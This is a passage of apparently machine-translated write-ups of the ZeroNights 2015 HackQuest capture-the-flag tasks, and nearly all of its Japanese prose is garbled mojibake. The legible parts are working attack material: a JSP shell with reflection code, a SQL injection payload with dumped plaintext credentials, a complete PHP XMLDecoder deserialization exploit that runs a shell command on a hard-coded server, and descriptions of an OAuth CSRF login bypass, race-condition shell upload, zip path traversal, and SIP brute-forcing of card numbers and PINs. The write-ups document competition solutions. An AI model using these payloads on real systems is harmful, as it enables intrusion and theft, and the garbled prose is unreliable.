ããã«ã¡ã¯
ZeroNightsã«ã³ãã¡ã¬ã³ã¹ã®æ°æ¥åã«æ®ããŸãããããã«ã€ããŠã¯ãã§ã«Habréã§æžããŠããŸãïŒ
æåŸã®æçš¿ã®1ã€ã¯ã
HackQuestã«ã€ããŠã®è©±
ã§ãã ã 圌ã¯ç¡äºã«åæ Œããã¿ã¹ã¯ãšãã®è§£æ±ºæ¹æ³ã«ã€ããŠã®æéãæ¥ãŸããã ãããŠãã¡ãã-åè³è
ãç¥çŠããŸãïŒ
- 1æ¥ç®ããã§ã³ã¬ãŒããã¡ã¯ããªãŒïŒãŠã§ãïŒã®å²ãåœãŠ-cdumpãšBlackFan
- 2æ¥ç®ãã¿ã¹ã¯ãHSM V1.0ãïŒWebãæå·ãããã·ã¥ã¯ã©ããã³ã°ïŒ-Abr1k0s
- 3æ¥ç®ãã¯ãšã¹ããBAZAAR NGãïŒãŠã§ãïŒ-AV1ct0r
- 4æ¥ç®ããILLOGICAL PHOTOGALLERYãïŒwebãoauthïŒ-Beched
- 5æ¥ç®ããCRACKMEãã¿ã¹ã¯ïŒãªããŒã¹ïŒ-sysenter
- 6æ¥ç®ã課é¡ãéè¡åŒ·çããïŒããªãŒãã³ã°ããŠã§ãïŒ-dr.glukyne
- 7æ¥ç®ãå²ãåœãŠãBLINK2PWNããïŒãªããŒã¹ããã€ããªpwnïŒ-mr_dawerty
1æ¥ç®-ãã§ã³ã¬ãŒãå·¥å Ž
ã¿ã¹ã¯ã¯åœåãããªãç¹å®ã®æ¡ä»¶-JSPã³ãŒãã®å®è¡ïŒå¶éä»ãã§èšç»ãããŠããïŒãæäŸãããããããã€ãã®å°é£ããããŸããã ã¿ã¹ã¯ãéå§ããããšããTomcatã¯ãã£ãã·ã¥ããªã»ããããïŒã¢ããªã±ãŒã·ã§ã³ããã¯ã©ã¹ã®1ã€ãæŽæ°ããåŸïŒãã¿ã¹ã¯ã¯RCEãä»ããŠè¡ãããŸãã:-)ååãªæéãããããåå è
éã®ç«¶äºãçºçããããããããæåŸ
ããããœãªã¥ãŒã·ã§ã³ãšããŠæ®ããŸãã
Cdumpãœãªã¥ãŒã·ã§ã³
é衚瀺ã®ããã¹ã泚æãäœæãããšãã«ãBurpãžã®ãã©ãŒã éä¿¡ãã€ã³ã¿ãŒã»ããããorderNameãã£ãŒã«ããanything.jspã«å€æŽããorderãã£ãŒã«ãã«jspã·ã§ã«ã®ããã¹ããå
¥åã§ããŸãã
ããŒãåŸãã·ã§ã«ãéãïŒãããã§æ³šæã確èªã§ããŸãããªã³ã¯ïŒãtomcat webappsãã£ã¬ã¯ããªãããŠã³ããŒããããã®äžã«jspãã¡ã€ã«ãšã³ã³ãã€ã«æžã¿ã¯ã©ã¹ãèŠã€ããjadãŠãŒãã£ãªãã£ïŒWEB-INF / classes / ZN_Chocolate / CRYPTOã䜿çšïŒ /SecretGrandParentForBigBossesNeeds.classïŒå¿
èŠãªããŒã衚瀺ãããŸãïŒprivate String TrueSecretChocolateKeyïŒïŒ{return "ZNVïŒiMp0518UrU_53cR3T_k3y_50d11dcb46506e93917f82c0e828b1a9"; }
ã¿ã¹ã¯ãåéãããåŸãäºæ³ããã解決çïŒ2äœããvraytap-BechedïŒ
é衚瀺ã®ããã¹ãå
¥å
ãã¡ã€ã«ã¢ããããŒãæ©èœãåãããµã€ãã
æåã¯ããã¯ã€ããªã¹ãããã€ãã¹ããŠãJSPã·ã§ã«ãXML圢åŒã§ã¢ããããŒãããããšã§ç°¡åã«è§£æ±ºã§ããŸããã ãã®åŸããã¹ãŠã®åå è
ã«ãœãŒã¹ã³ãŒããæäŸãããŸããã
ã¿ã¹ã¯ã¯ããœãŒã¹ã³ãŒããèªãããšã§ãäžæ£ããªæ¹æ³ã§è§£æ±ºã§ããŸããããæå³ããæ¹æ³ã§è§£æ±ºããŸããã
åºå
JD-GUIïŒ ã¹ã¯ãªãŒã³ã·ã§ããã§ã¯ã©ã¹ãéããŸãã
ããŒãžã€ã³ããŒãã解æããJSPãã§ãã«ãŒã®ãœãŒã¹ã³ãŒãã確èªã§ããŸãã ãã®æããªãã§ãã«ãŒããã€ãã¹ããæ¹æ³ã¯ãããããããŸããããã¡ã€ã«ã·ã¹ãã ãèªã¿åããã«ãã©ã°ãååŸããããšããŸãã æåããã©ã°ã¯SecretGrandParentForBigBossesNeeds.classã«ãããŸããã
public class SecretGrandParentForBigBossesNeeds { private String TrueSecretChocolateKey() { return "ZNV:3X@mPl3_k3y_a0a81ab87f74d307b8e51fd85048e714"; }
å·ŠåŽã®ã¹ã¯ãªãŒã³ã·ã§ããã§ã¯ãç¶æ¿ãããã¯ã©ã¹ã®é·ããã§ãŒã³ãèŠãããšãã§ããŸããããã¯æããã«ããªãã¬ã¯ã·ã§ã³ã䜿çšããå¿
èŠãããããšã瀺ããŠããŸãã SecretGrandParentForBigBossesNeedsãã€ã³ããŒãããããšãããšå€±æããŸããã·ãŒã¯ã¬ãããã€ã³ããŒãããŠã¿ãŸãããã
<%@ page import="java.lang.reflect.*,ZN_Chocolate.CRYPTO.Secret" %> <% Secret s = new Secret(); out.println(s.TrueSecretChocolateKey()); %>
Hmããšã©ãŒ500 ...èªã¿åãããšãã§ããã¹ã¿ãã¯ãã¬ãŒã¹ã§ã¯ããã¯ã©ã¹SadBigBossã®ã¡ãœããTrueSecretChocolateKeyã¯è¡šç€ºãããŸãããã
ããïŒ ãœãŒã¹ã³ãŒããä¿®æ£ããåŸãã¯ã©ã¹ã®ååãå€æŽããŸããã ãããããšã«ãããã¡ãœããã¯è¡šç€ºãããããã©ã€ããŒãã§ãã ãªãã¬ã¯ã·ã§ã³ã䜿çšããŠã¢ã¯ã»ã¹å¯èœã«ããŸãã
<%@ page import="java.lang.reflect.*,ZN_Chocolate.CRYPTO.Secret" %> <% SadBigBoss s = new SadBigBoss(); Method method = s.getClass().getDeclaredMethod("TrueSecretChocolateKey"); method.setAccessible(true); out.println(method.invoke(s)); %>
ããã ãã§ãããã©ã°ã¯ããŒãžã«ãããŸã=ïŒ
2æ¥ç®-HSM V1.0
ãã®ã¿ã¹ã¯ã¯ãç§ãã¡ã®ããã¯ã¯ãšã¹ãã§ã¯äžè¬çã§ã¯ãããŸããã§ãããå®å
šã«ç°ãªãããã·ã¥ããã«ãŒãã¢ãããã人æ°ã®ãªãã¢ã«ãŽãªãºã ã®å®è£
ãæ¢ããŠæé©åããå¿
èŠããããŸããã
Abr1k0sããã®Vraytap
é衚瀺ã®ããã¹ã1.ãã³ããããŠã³ããŒãããŸãã
2.ãã°ã€ã³ããã¹ã¯ãŒããšããŠäœ¿çšããŠãã·ã¹ãã ã«ç°¡åã«ãã°ã€ã³ã§ãããŠãŒã¶ãŒãèŠã€ããŸããã
3.ç§ã¯ãã©ã€ããŒãã¡ãã»ãŒãžã«å
¥ããä»ã®äººã®ã¡ãã»ãŒãžãèªãããšãã§ããããšã«æ°ã¥ããŸããã èªãã åŸãç§ã¯ãã¹ã¯ãŒããç·æ¥ã«å€æŽããå¿
èŠããããšããã¡ãã»ãŒãžãšãå€ããã¹ã¯ãŒãã«åºã¥ããŠæ°ãããã¹ã¯ãŒããçæããæ¹æ³ã«é¢ããæ瀺ã管çè
ã«éãããã®ãèŠãŸããã
ããã«ã¡ã¯ïŒ ãŠãŒã¶ãŒãã³ãã䟵害ãããŸããã ãã¹ãŠã®ç®¡çè
ã¯ãã¹ã¯ãŒããå€æŽããå¿
èŠããããŸã!!! ä»ããïŒ
ã»ãã¥ãªãã£äžã®åé¡ã®ãããsupergenpassã䜿çšããå¿
èŠããããŸãã ããªãç°¡åã§ãã ãã¹ã¯ãŒããšãã¡ã€ã³ãå
¥åããã ãã§ãçŽ æŽããããã¹ã¯ãŒããåŸãããŸã
4. devãµããã¡ã€ã³ãèŠã€ããŸããã åºæ¬èªèšŒçšã®ãã¹ã¯ãŒããååŸããŸããã
5.ãœãŒã¹ã®äžéšãšãã¹ã¯ãŒãã§ä¿è·ãããã¢ãŒã«ã€ããããŠã³ããŒãããã¢ãŒã«ã€ããããã¹ã¯ãŒãããã«ãŒããã©ãŒã¹ããŸãããããã§ã詳现ãªãã¹ã¯ãŒãããã·ã¥ã¹ããŒã ã§ããããšãå€æããŸããã
6.ã¢ãŒã«ã€ãã®æ瀺ã«èšèŒãããŠããããã·ã¥é¢æ°ãå®è£
ããã¹ã¯ãªãããäœæããŸããã 䜿çšãããŠãããã¹ãŠã®ã¢ã«ãŽãªãºã ã¯ãpdfã«æ瀺ãšãšãã«èšèŒãããŠãããªã³ã¯ã«ãããŸãã
7.玺toã«è¡ãããã¹ãã¢ã«ãŠã³ãã䜿çšããŠ16å°ã®æ žãµãŒããŒãã¬ã³ã¿ã«ããããã§ãã«ãŒããã©ãŒã¹ããã·ã¥ãéå§ããŸããã ããã¯ãèªå®
ã®ã³ã³ãã¥ãŒã¿ãŒãã©ããããããããã«ãŒããã©ãŒã¹ãè¡ã£ã人ãããæå©ã§ããã
8.éžæãããã¹ã¯ãŒãã®æåã®æåïŒããã³æ®µèœ3ã§åä¿¡ããã¡ãã»ãŒãžã«åºã¥ãïŒããããã«ãŒããã©ãŒã¹ç®¡çã¢ã«ãŠã³ãã®å Žåãsupergenpassãè¿œå ããŠãã«ãŒããã©ãŒã¹ã¢ã«ãŽãªãºã ãè£å®ããå¿
èŠãããããšã«æ°ä»ããŸããã
9.ãã®çµæããtheflagis287a2ef40fe140fd1acf8ec695ba1e53replacesgppasswithmasterpassandyougettrueflagããšãããã¬ãŒãºããåä¿¡ãããã¹ã¯ãŒãã®æåã®æåããååŸãããŸããã
ãã©ã°ïŒ287a2ef40fe140fd1acf8ec695ba1e53
3æ¥ç®-ãã¶ãŒã«NG
ããã¯ã¿ã¹ã¯ã¹ããªã³ãã§ãããããªã³ã©ã€ã³ããŒã±ãããã§ãïŒååã®ç±æ¥ã§ãïŒã jspãšãµãŒãã¬ãããHibernateãRestlet APIãªã©ãããŸããŸãªJavaããŒã¹ã䜿çšããŸããã
ãã®ã¿ã¹ã¯ã¯ã次ã®3ã€ã®äž»ãªè匱æ§ã§æ§æãããŠããŸããããããã¯ããªãã€ã¬ã¯ãåŸã®å®è¡ãHQLã€ã³ãžã§ã¯ã·ã§ã³ïŒHibernateå°çšã®SQLã€ã³ãžã§ã¯ã·ã§ã³ã®é¡äŒŒïŒãRestletã§ã®XMLã·ãªã¢ã«åã«ããRCEã§ãã
ããããå€ãã®å°ããªè匱æ§ãæ®ããïŒãã«ãŒãã¢ã«ãŠã³ããXSSãªã©ã®å¯èœæ§ïŒãä»ã®åå è
ïŒãŸãã¯ç®¡çè
ããïŒããæ»æãããã¿ã¹ã¯ã®äžéšããã€ãã¹ããããšãã§ããŸããã
éåžžã«ç°¡åã«ãAV1ct0rã®å ŽåïŒ
é衚瀺ã®ããã¹ã1. admin.jspãsearch.jspãindex.jspãadmin_login.jspãadminochka.jspãadminochka.jsp.bakãèŠã€ãããŸãã
2.ãã¹ã/ãã¹ããåé€ïŒæããã«èª°ããè¿œå ïŒ
3.泚å
¥
potato 'AND' 1 \ '' = 1 union select 1ãïŒselect userïŒïŒïŒã3-'=' 1ïŒ
ãã¹ãïŒzn-java
ããŒãžã§ã³ïŒ5.5.46-0ubuntu0.14.04.2
ãŠãŒã¶ãŒïŒwebappuser @ localhost
wepapp.developers --------------------------------------- | id | username | password | --------------------------------------- | 0 | developer_Vasia | fpBA7BPlS8wJ | | 1 | developer_Jorik | 5FftW6Aua2ef | --------------------------------------- wepapp.goods ------------------------- | id | name | price | ------------------------- | 0 | potato | 40 | | 1 | apple | 100 | | 2 | carrot | 25 | | 3 | tomato | 120 | | 4 | pear | 70 | | 5 | tomato | 110 | | 12 | pear | 80 | | 13 | cucumber | 80 | ------------------------- wepapp.users ---------------------------- | id | username | password | ----------------------------
...
4.ã¯ã©ã€ã¢ã³ãããã©ãã£ãã¯ãã³ã³ãã€ã«ããŠèšé²ããŸãã
5. xmlãã·ãªã¢ã©ã€ãŒãŒã·ã§ã³ã«ããRCEïŒsolve.phpïŒ
solve.php
é衚瀺ã®ããã¹ã <?php $x =<<<HTML <?xml version="1.0" encoding="UTF-8"?> <java version="1.8.0_05" class="java.beans.XMLDecoder"> <object id="_response" class="java.lang.String"> <string>Mode 1 to get a value</string> </object> <object id="runtime" class="java.lang.Runtime" method="getRuntime"> <void id="process" method="exec"> <string>cat webapps/flag.txt</string> </void> </object> <object idref="process"> <void id="inputStream" method="getInputStream"/> </object> <object id="inputStreamReader" class="java.io.InputStreamReader"> <object idref="inputStream"/> </object> <object id="bufferedReader" class="java.io.BufferedReader"> <object idref="inputStreamReader"/> </object> <object idref="bufferedReader"> <void id="line1" method="readLine"/> </object> <object idref="bufferedReader"> <void id="line2" method="readLine"/> </object> <string id="response"> <object idref="line1"/> <object idref="line2"/> </string> <object class="org.restlet.Response" method="getCurrent"> <void method ="setEntity"> <object idref = "response"/> <object class = "org.restlet.data.MediaType" field="TEXT_HTML"></object> </void> </object> </java> HTML; do { $socket = fsockopen("107.170.122.167", 80); } while (!$socket); $packet = "POST /ZN_HQ/API/prods HTTP/1.0\r\n"; $packet.= "Content-Type: application/x-java-serialized-object+xml\r\n"; $packet.= "Host: 107.170.122.167\n"; $packet.= "Connection: Close\r\n"; $packet.= "Content-Length: ".strlen($x)."\r\n"; $packet.= "Authorization: Basic ZGV2ZWxvcGVyX1Zhc2lhOmZwQkE3QlBsUzh3Sg==\r\n"; $packet.= "\r\n"; $packet.= $x; fwrite($socket, $packet); while(!@feof($socket)) echo fread($socket, 4096); fclose($socket); ?>
4æ¥ç®-å¹»æ³çãªãã©ãã®ã£ã©ãªãŒ
OAuthïŒvkïŒãCSRFãzipãã¹ãã©ããŒãµã«ãªã©ã®å®è£
äžã®ãã°ã¯ãåå è
ãèŠã€ããŠæªçšããããã管çããå¿
èŠããããŸããïŒç®¡ç察象ã¯ã»ãšãã©ãããŸããïŒã
Bechedããã®Vraytap
é衚瀺ã®ããã¹ãå
¥å
OAuthïŒvk.comïŒæ©èœãåãããµã€ãïŒ0x3d.ruïŒã
æ€åºäžã«ãcontent.0x3d.ruããã³dev.0x3d.ruïŒ127.0.0.1ïŒãµããã¡ã€ã³ãèŠã€ããããšãã§ããŸãã
åºå
XSSãSQLã€ã³ãžã§ã¯ã·ã§ã³ãRCEãªã©ãå€ãã®æå³ããªããã°ããããŸããããããã®ããã€ããããã§èª¬æããŸãã
1.èªèšŒãã€ãã¹ïŒæå³ããªãïŒ
Burk Suiteãä»ããŠvkã¢ã«ãŠã³ãã§ãã°ã€ã³ããèªèšŒããŒã¯ã³ïŒïŒCode = ...ïŒã®ãªã³ã¯ãååŸããŠããã©ã€ããŒãã¿ãã§ããã²ãŒãããŸãã ããã§ãç¹æš©ãŠãŒã¶ãŒãšããŠãã°ã€ã³ãããã¡ã€ã«ãã¢ããããŒãã§ããŸãã
2.èªèšŒãã€ãã¹
Burk Suiteã䜿çšããŠvkã¢ã«ãŠã³ãã§ãã°ã€ã³ããèªèšŒããŒã¯ã³ïŒïŒCode = ...ïŒã䜿çšããŠãªã³ã¯ãäœæããWebãµã€ãã«2ã€ã®ã€ã¡ãŒãžãããŒãããããŒãžãäœæããŸãïŒ<img src = ...ïŒïŒæåã®ãã°ã¢ãŠããããªã¬ãŒããŸãCSRFïŒ/ logoutãªã©ïŒã2çªç®ã¯èªèšŒããŒã¯ã³ãªã³ã¯ã§ãã ãã®ãªã³ã¯ãç¹æš©ãŠãŒã¶ãŒã«éä¿¡ãããšã圌ïŒãããïŒãããã²ãŒããã圌ã®ã¢ã«ãŠã³ããvkãããã¡ã€ã«ã«æ¥ç¶ãããŸãã ããã§ãç¹æš©ãŠãŒã¶ãŒãšããŠãã°ã€ã³ã§ããŸãã
3.競åç¶æ
ïŒæå³ããªãïŒ
ç¹æš©ãŠãŒã¶ãŒã¯ã¢ãã¿ãŒãã¢ããããŒãã§ããŸãã ã* .phpãã¯èš±å¯ãããŸããããããjpg.phpãã¯åé¡ãããŸãã=ïŒã·ã§ã«ã¯ã©ãã«ãããŸããïŒ ã¢ãã¿ãŒã¯content.0x3d.ru/avatarsã«ã¢ããããŒããããŸããã$ hash.jpgã«å€æãããŸãã ãã¡ã€ã«ãæåã«åããã£ã¬ã¯ããªã«ã¢ããããŒãããããã®åŸå€æããããšä»®å®ããŸãã
BurpSuiteã䜿çšããŠã100åã®ã¹ã¬ãããèµ·åãïŒGET /avatars/beched.jpg.phpãHostïŒcontent.0x3d.ruïŒãbeched.jpg.phpãã¢ããããŒãããŸãã ãã200 ããããšããã¬ãŒã³ããã¹ã...圌ãã¯ãã®ãã£ã¬ã¯ããªã§PHPã®å®è¡ãç¡å¹ã«ããŸãããããšã«ãããããã¯å±éºãªãã°ã§ãã
4. SQLã€ã³ãžã§ã¯ã·ã§ã³ïŒæå³ããªãïŒ
ãã©ã€ããŒãã¡ãã»ãŒãžã³ã°ã€ã³ã¿ãŒãã§ã€ã¹ã«SQLã€ã³ãžã§ã¯ã·ã§ã³ãããããã«ãINSERTããã³æšæž¬ãã£ãŒã«ãã䜿çšããŠãããæªçšã§ããŸããã file_privãšãã©ã°ã¯ãããŸããã§ããããã¿ã¹ã¯ã®äœæè
ã«ããPoCèªèšŒãã€ãã¹ãšã¯ã¹ããã€ããžã®ãªã³ã¯ããããŸããã ãã®ãµãŒããŒã§ã¿ã¹ã¯ã®äœæ¥ã³ããŒãèŠã€ããŸãã=ïŒ
5.ã³ãŒãã®å®è¡ïŒæå³ããªãïŒ
ãã®ãããèè
ã®ãã¹ããµãŒããŒããããŸãã ãã°ã€ã³ããŠãSQLã€ã³ãžã§ã¯ã·ã§ã³ã確èªããŸãããã ãããŒãfile_priv = YããããŸãïŒ ãœãŒã¹ã³ãŒããèªã¿åããæ§æãèªã¿åãããã©ã°ãªã=ïŒ
ãã ããZIPã¢ããããŒãæ©èœã«ã¯ä»ã«ãäœãããããŸãã
elseif(preg_match('/[.](ZIP)|(zip)|(RAR)|(rar)$/',$_FILES['fupload']['name'])) { $avatar = 'avatars/net-avatara.jpg'; $filename = $_FILES['fupload']['name']; $source = $_FILES['fupload']['tmp_name']; $target = $path_to_90_directory . $filename; move_uploaded_file($source, $target);
ãã®ããããã¡ã€ã«åã§ã³ãŒããå®è¡ã§ããŸãã ãã ãããã®ãã¹ããµãŒããŒã«ã¯ãã©ã°ã¯ãããŸããïŒ
ïŒ
6.ã³ãŒãã®å®è¡
ããã圌ããæãããšãããŸãããã content.0x3d.ruã®docrootã«ã·ã§ã«ãã¢ããããŒãããŸãããã github.com/ptoomey3/evilarcã§è¡ããŸã
ãã¹ãã©ããŒãµã«ã䜿çšããŠZIPã¢ãŒã«ã€ããäœæãããšãå¿
èŠãªãã£ã¬ã¯ããªã«æœåºãããŸãïŒæžã蟌ã¿å¯èœãªå ŽåïŒã ããã§content.0x3d.ruã«PHPã·ã§ã«ãã§ããŸãã
7. open_basedir bypassïŒæå³ããªãïŒ
ã³ãã³ãå®è¡æ©èœã¯ç¡å¹ã«ãªã£ãŠããŸãããDirectoryIteratorã§ä»»æã®ãã£ã¬ã¯ããªãåç
§ã§ããŸãïŒ ahack.ru/releases/glob_wrapper_open_basedir_exploit.php.txt
ãšããã§ãputenvïŒïŒããã³mailïŒïŒã¯ç¡å¹åãããŠããŸããããã©ããããããã©ã€ãã©ãªã®ããªããŒããšsendmailã®ããªã¬ãŒãä»ããã³ãã³ãå®è¡ã¯æ©èœããŸããïŒ
ïŒ
8.ãã©ã°
devã0x3d.ruãèŠããŠããŸããïŒ Webã·ã§ã«ããè©ŠããŠã¿ãŸãããã
readfileïŒ 'http://dev.0x3d.ru'ïŒ;
Beched'aããã®ããå€ãã®vraytapov5æ¥ç®-ã¯ã©ãã¯ããŒ
ã¯ã©ã·ã㯠3ã€ã®ç°ãªã段éã§ããŒãèŠã€ããå¿
èŠããããŸããã æåã®2ã€ã®ã¢ã«ãŽãªãºã ã¯ããªãããç¥ãããŠããŸãããã3çªç®ã®ã¢ã«ãŽãªãºã ã¯ããã§ã¯ãããŸããã§ããã
sysenterã«ãã
Wysitap-hackquest.zeronights.org/downloads/2015-day5-writeup_sysenter.pdf6æ¥ç®-ã°ã«ãã³å士
ã¿ã¹ã¯ã¯... SIPãä»ããŠSIPãçªç Žããããšã§ããã
dr.glukyneã®Vraytap
é衚瀺ã®ããã¹ã1ïŒãªã³ã¯ããã©ããšããã°ã€ã³ãã©ãŒã ãšç»é²ãããªã³ã¯ãèšèŒãããã€ã³ã¿ãŒããããã³ã¯ã®ããã³ãããŒãžã衚瀺ãããŸãã
ãŸãã§éè¡ã®SIPãµãŒãã¹ãäžæããå¿
èŠãããããšã瀺åãããŠã§ã«ã«ã ã¡ãã»ãŒãžã ãããŠãã¿ã¹ã¯èªäœã¯ããªãŒãã³ã°ã«èšåããŠããŸã
-en.wikipedia.org/wiki/Phreaking2ïŒã€ã³ã¿ãŒããããã³ãã³ã°ã€ã³ã¿ãŒãã§ã€ã¹ã«ç»é²ããã«ãŒãçªå·ãšPINã³ãŒããååŸããŸãã
3ïŒSIPãæ¢ããŸããããããã¯å£ããŸãïŒ
$: nmap -p 5060 -T4 -A -v bank.defcon.su ..... PORT STATE SERVICE VERSION 5060/tcp open sip-proxy Asterisk PBX 11.17.1 |_sip-methods: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, PUBLISH, MESSAGE .......
å®éãåœç€Ÿã®ã€ã³ã¿ãŒããããã³ã¯ã«ã¯SIPãµãŒãã¹ããããã»ãšãã©ã®SIPãšåæ§ã«ãããŒã5060ã§å©çšã§ããŸãã
4ïŒãã®ãµãŒãã¹ã«æ¥ç¶ããŠã¿ãŸãããã
å°ãébruã§ãã³ããäžããåŸããã¹ã¯ãŒãtestã§ã¢ã«ãŠã³ãtest@bank.defcon.suãååŸããŸã
ãã ããåŒã³åºãæ¡åŒµæ©èœãç解ããå¿
èŠããããŸãã ã¢ã¹ã¿ãªã¹ã¯ã«ã¯æ¡åŒµåsããããçªå·
www.voip-info.org/wiki/view/Asterisk+s+extensionãäžæãªå Žåã«äœ¿çšãããŸã
圌ã«é»è©±ããŸãïŒs@bank.defcon.suéè¡ããã®æšæ¶ãèãããŸããããã§ãã«ãŒãã®çš®é¡ïŒMastercardãŸãã¯VisaïŒãéžæãããã®çªå·ãšPINã³ãŒãããã€ã€ã«ããå¿
èŠãããããšãæããã«ãªããŸãã ç»é²æã«æå®ãããã«ãŒãã®è©³çŽ°ãå
¥åãããšãé話ã¯çµäºããŸãã ç¡å¹ãªPINã³ãŒããå
¥åãããšããã®å
¥åãç¹°ãè¿ãããã«æ±ããããŸãã ééã£ãã«ãŒãçªå·ãå
¥åãããšãåå
¥åãæ±ããããŸãã ãããã£ãŠãæåã«ã«ãŒãçªå·ãã次ã«PINã³ãŒãããã«ãŒãããããšããããšãã§ããŸãã
5ïŒVisaããã³Mastercardæ¯æãã·ã¹ãã ã§ã¯ãç°ãªãçªå·ä»ãã·ã¹ãã ã䜿çšãããŸãïŒ
en.wikipedia.org/wiki/Bank_card_numberVisaã§ã¯ã13æ¡ãŸãã¯16æ¡ã®æ°åãå¯èœã§ããMastercardã§ã¯ã16æ¡ã®ã¿ã§ãã ããŒã«ãããã®å€èŠ³ã¯ããã®Visaã®ç°åžžãåã³åŒ·èª¿ããŠããŸãã
6ïŒPythonçšã®é©åãªSIPã¯ã©ã€ã¢ã³ãã®ã€ã³ã¿ãŒãããæ€çŽ¢ã¯æåããªãã£ãã®ã§ã
Brute Visaã«ãŒãçªå·ã¯æåã§äœæããŸããããããã«ã¯æéãããããŸããã ãã®éçšã§ãæ°åã®æåŸã®4æ¡ã®ã¿ããã§ãã¯ãããæ€çŽ¢ã倧å¹
ã«ç°¡çŽ åãããããšãããããŸããã ãŸãã䞊ã¹æ¿ãã®éçšã§ãéè¡ã®Webãµã€ãã§ãã¿ã¹ã¯ã®äœæè
ãDefcon DC7499ããã³2600ã°ã«ãŒãã«å±ããŠããããšã瀺ãããŸããããæ€çŽ¢çªå·ã¯7499ããã³2600ãšã¯ç°ãªãããšãå€æããŸããã
7ïŒæ£ããçªå·ã¯1215ã§ããããšãå€æããŸããããã®å
¥åã«å¿çããŠãå®å
šãªã«ãŒãçªå·4556796461215ãååŸããŸãã
Jitsiãžã®é話ãé²é³ããæ©èœã¯ãçªå·ãååŸããã®ã«éåžžã«åœ¹ç«ã¡ãŸããã
8ïŒãã³ã³ãŒããæŸãããšãæ®ã£ãŠããŸãã ç¹°ãè¿ããŸããã7499ãš2600ã«ã€ããŠæãåºããŠãã ãããå®éã«ã¯2600ãé©ããŠããŸãã
9ïŒWebãã§ã€ã¹ã«ã«ãŒãçªå·ãšPINã³ãŒããå
¥åãããã©ã°ãçæããã³ãŒããååŸããŸãã
7æ¥ç®-Mr_dawerty
ã¿ã¹ã¯ã¯å£®å€§ã§ãã¿ã¹ã¯ã¯AVRã®ãã¡ãŒã ãŠã§ã¢ãå±éããããã§è匱æ§ïŒãªãŒããŒãããŒïŒãèŠã€ãããªã¢ãŒãã§æªçšããããšã§ããïŒuartã®å€éšTCPããŒãããã®ããªããžããããŸããïŒã æåã«ç§å¯ã®æïŒçµ¶ããå€åããŠããïŒããªãã«ããLEDã§2åç¹æ»
ããå¿
èŠããããŸããïŒåå è
ã¯ãã€ããŒããžã®åå¿ãã©ã€ãã§èŠãŸããïŒã ã¿ã¹ã¯ã¯æ°å延é·ããã1æ¥ã§ã¯ãªã4æ¥ãçµéããŸããã
ããã¯ç§ãã¡ã®ãªãã£ã¹ã§ã©ã®ããã«èŠãããã§ãïŒ
ãããŠãããã¯åå è
ãæ¢ããŸããïŒãããŒããã£ã¹ãã¯ffmpeg + nginx-rtmpã§ç·šæããã2ã3ç§ã®é
延ãéæããããšãã§ããŸããïŒ
ãŸã vraytapã¯ãããŸããããAVRã¯ãŒã¯ã·ã§ããã®ãã¬ãŒã ã¯ãŒã¯å
ã§ZeroNightsèªäœã®åæãè¡ãããŸãïŒããã«ã€ããŠã¯å¥ã®èšäºã§èª¬æããŸãïŒã
å²ãåœãŠã®ãã¹ãŠã®äœè
ãã€ãŸã
@aplastunov ã
@ w34kp455 ã
@antyurin ã
@igc_iv ã
@nkelesis ã
@Lukesparamore ã
__ ek0 ã
@ 090h ã
@nezlooy ã
@ cherboff ã
dark_k3yããã³Litvinov Egorã«åã³æè¬ããããšæããŸãã
HackQuestã«ã€ããŠã®ããã«ã€ããŠ-ãã¹ãŠãééããäŒããæé
ããŒããŠã§ã¢ãã¬ããž
äž¡æ¹ã®ããŒããŠã§ã¢ãã¬ããžããã°ã©ã ïŒ
1æ¥ç®ïŒ- ããŒããŠã§ã¢ã»ãã¥ãªãã£ãäžè¬çãªè匱æ§ããã³æ»æã®æŠèŠã
- ã©ãããå§ããŸããïŒ åºæ¬çãªãããã³ã«ãšã€ã³ã¿ãŒãã§ãŒã¹ã ããŒããŠã§ã¢ãžã®æçãã¹ã¯ãã¯ã€ãã¯ã¹ã¿ãŒãã§ããarduinoã§ãã
- UARTãSPIãi2Cã®æŠèŠïŒãããäœã§ãããã4ã¯ãã¯ããããšã®æ¥œãã¿ãšå©çã
- ã¹ããã¡ãŒãšããžãã¯ã¢ãã©ã€ã¶ãŒã®æäœã®åºæ¬ã
- JTAGãããã³ã«ïŒéçºè
ããã³ããã«ãŒåãã
2æ¥ç®ïŒ- ã¯ã€ã€ã¬ã¹ãã¯ãããžãŒãäžè¬çãªè匱æ§ããã³æ»æã®æŠèŠã
- RFIDè¿æ¥ã«ãŒã-äœåšæ³¢ã«ãŒãã
- RFIDè¿æ¥ã«ãŒã-é«åšæ³¢ã«ãŒãã ãã¯ãããžãŒãæ»æãéã
- ãœãããŠã§ã¢ç¡ç·ã®æŠèŠã
- æ°éãã³ãã®ç¡ç·éä¿¡ãã£ãã«ã ãããã³ã«ã®çŽ¹ä»ããããã³ã°ã®æ¢æ±ã
- å®å
šã§ãªãWi-fiãbluetoothãzigbeeã
- å
ããŒã¿ãªã³ã¯ïŒIRïŒ
説æãããŠãããã¹ãŠã®æè¡ãšæ»ææ¹æ³ã¯ãå®éã®äŸã§èŠã€ããããšãã§ããŸãã
ç»é²ã¯ææ¥14:
00-2015.zeronights.ru/registraciya.htmlã§çµäºããããšãæãåºããŠãã ãããããã°ã©ã ã¯æºåãã§ããŠãããæçµçãªæºåãé²è¡äžã§ãã ZeroNights 2015ã§ãäŒãããŸãããïŒ